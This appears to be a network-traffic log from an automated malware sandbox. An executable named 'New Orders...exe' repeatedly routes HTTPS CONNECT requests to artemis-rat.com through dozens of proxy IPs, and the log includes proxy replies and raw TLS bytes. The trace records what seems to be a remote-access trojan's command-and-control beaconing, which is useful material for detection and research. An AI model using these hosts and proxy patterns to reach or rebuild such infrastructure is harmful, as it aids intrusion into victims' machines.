                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.132565975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.459889889 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:50 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        975192.168.2.95275191.241.217.5890907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.443331003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        976192.168.2.9529303.90.100.1231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.450714111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.668036938 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        977192.168.2.95311743.153.81.604437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.451266050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        978192.168.2.952976104.16.213.202807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.451762915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.606452942 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        979192.168.2.95312143.153.81.604437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.454955101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        980192.168.2.95312643.153.81.604437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.456708908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        981192.168.2.95312943.153.81.604437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.458028078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        982192.168.2.95298974.48.7.43807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.467113972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.627623081 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.25.3
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        983192.168.2.952830217.52.247.8619817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.467272997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.242077112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.324290991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.445281982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.632751942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.742232084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.872771025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.132687092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:24.632507086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        984192.168.2.951999162.241.46.54468497672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.518268108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.663783073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773751974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.773621082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:07.867202997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.960608006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:31.960653067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:55.960753918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        985192.168.2.95283847.242.234.237807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.518496037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        986192.168.2.951720202.124.46.10241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.519026041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        987192.168.2.950685195.98.93.23410807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.519294024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        988192.168.2.952839154.12.178.107299857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.519774914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        989192.168.2.95283645.138.87.23810807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.532030106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        990192.168.2.952842185.49.30.580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.532208920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        991192.168.2.9528374.144.161.159807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.533633947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.246681929 CET59INHTTP/1.1 200 Connection Established
                                                                                        Proxy-agent: nginx
                                                                                        Mar 11, 2024 16:16:44.247049093 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 5b 8f e0 d8 1f 84 4a 99 b9 f8 76 a6 6f 8c 1f 32 a7 b6 f8 eb a8 ce f4 32 b7 cb 2e eb 3e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e [Jvo22.>*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:44.592741966 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ef 20 5c 5e ee cd b9 e8 ea e8 9b cd 7b 17 4c 7b 64 0e 2c 08 e4 4c 69 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                        Data Ascii: C?e \^{L{d,LiDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                        Mar 11, 2024 16:16:44.593039989 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                        Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                        Mar 11, 2024 16:16:44.593050003 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                        Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                        Mar 11, 2024 16:16:44.593265057 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                        Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                                        Mar 11, 2024 16:16:44.638165951 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 1e 9a ab 0e 6a 11 fb a9 c7 b4 c6 a2 5d 8b ab 60 00 79 9b bb 24 35 b8 26 11 8c 27 20 6a 0d 18 40 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 0e 83 7e 3e eb 15 5c 82 a9 86 84 d2 4e a9 5f 5a f1 b1 33 01 30
                                                                                        Data Ascii: %! j]`y$5&' j@(~>\N_Z30X3X$n
                                                                                        Mar 11, 2024 16:16:44.979212046 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 fe da 02 3d 4a 01 14 c2 d9 2a 3d f5 f5 3b 09 eb 5e cd a6 0d ba ad 5b 40 27 cb fe 13 de 2a 1d 38 5b 48 3a be 8c 6a f9 8d 4c cc 8d ab d8 ee aa f0 dd eb a4 d9 2e 33 65 b0 ab de 48 31 ca 4b c5 36 e0 d4 43
                                                                                        Data Ascii: =J*=;^[@'*8[H:jL.3eH1K6CD9FNVKw):Et]GVvi7qk6d^F_Ef8o$24cQ" |Gym*qDNbq$VCg(!PP4
                                                                                        Mar 11, 2024 16:16:45.101227045 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 20 4d 56 8f 4c ec 57 02 f3 03 5f 80 3e 7c c3 9a 6b 71 37 58 6d b3 c6 7e ea 95 e1 78 23 2a c6 ef 31 ff cf 51 a6 36 43 e3 f9 d6 f0 3f 8c b6 3f 41 e8 cd 20 c9 70 ea de c0 e7 6d c8 31 05 5c 72 58 c0 81 9b 5a ce
                                                                                        Data Ascii: MVLW_>|kq7Xm~x#*1Q6C??A pm1\rXZF#`3ZegKWtH<T.I9/_s25V#W!E$SJ*9>%]AF9EKD)Y7f`\wSD&^N]f](-M2#
                                                                                        Mar 11, 2024 16:16:45.454322100 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 b2 bd 4d 76 ea 88 b8 c7 68 0d 51 b5 dc a3 9c 96 15 e0 be d9 10 a1 2f 1b 56 70 dd c4 ef cd 2f d9 bb 7a 68 48 d7 cd 1e 33 8f ae d5 3c 1a 08 60 0b 42 ce 7b 7e ec f3 da e4 83 e7 97 71 69 f7 32 32 3f c0 bf 18 74
                                                                                        Data Ascii: qMvhQ/Vp/zhH3<`B{~qi22?tRyT.J#wTfzJ 7T9!^i|kZ#qyd|xCdIyTNi:^ +#"og-Y`ZtK;?%U!
                                                                                        Mar 11, 2024 16:16:45.454504013 CET1286INData Raw: 34 fe 7e 73 79 d8 60 8e 13 62 83 25 b7 48 33 61 c4 8f 04 35 31 46 3a 73 bd 26 e0 51 6d 63 43 2a 42 19 e1 15 ff ee d4 10 a1 67 7b 55 7a b6 b2 c5 f7 ec 6d a0 50 23 02 ca 5b 3b c7 0d dd bc 3e ea 4a cb c8 95 8e b4 af 02 a2 db 8e 78 10 c0 7a 8d 4e 53
                                                                                        Data Ascii: 4~sy`b%H3a51F:s&QmcC*Bg{UzmP#[;>JxzNSpOK8\y$}wQ(oqb5_ZKdK)|*@jWo-a*"9^Ui#Yw#{_MEU:jaNVHyYc


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        992192.168.2.95297313.59.156.16731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.534145117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.750961065 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        993192.168.2.952894213.17.246.4631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.536633015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.852997065 CET696INHTTP/1.1 403 Forbidden
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 548
                                                                                        Connection: keep-alive
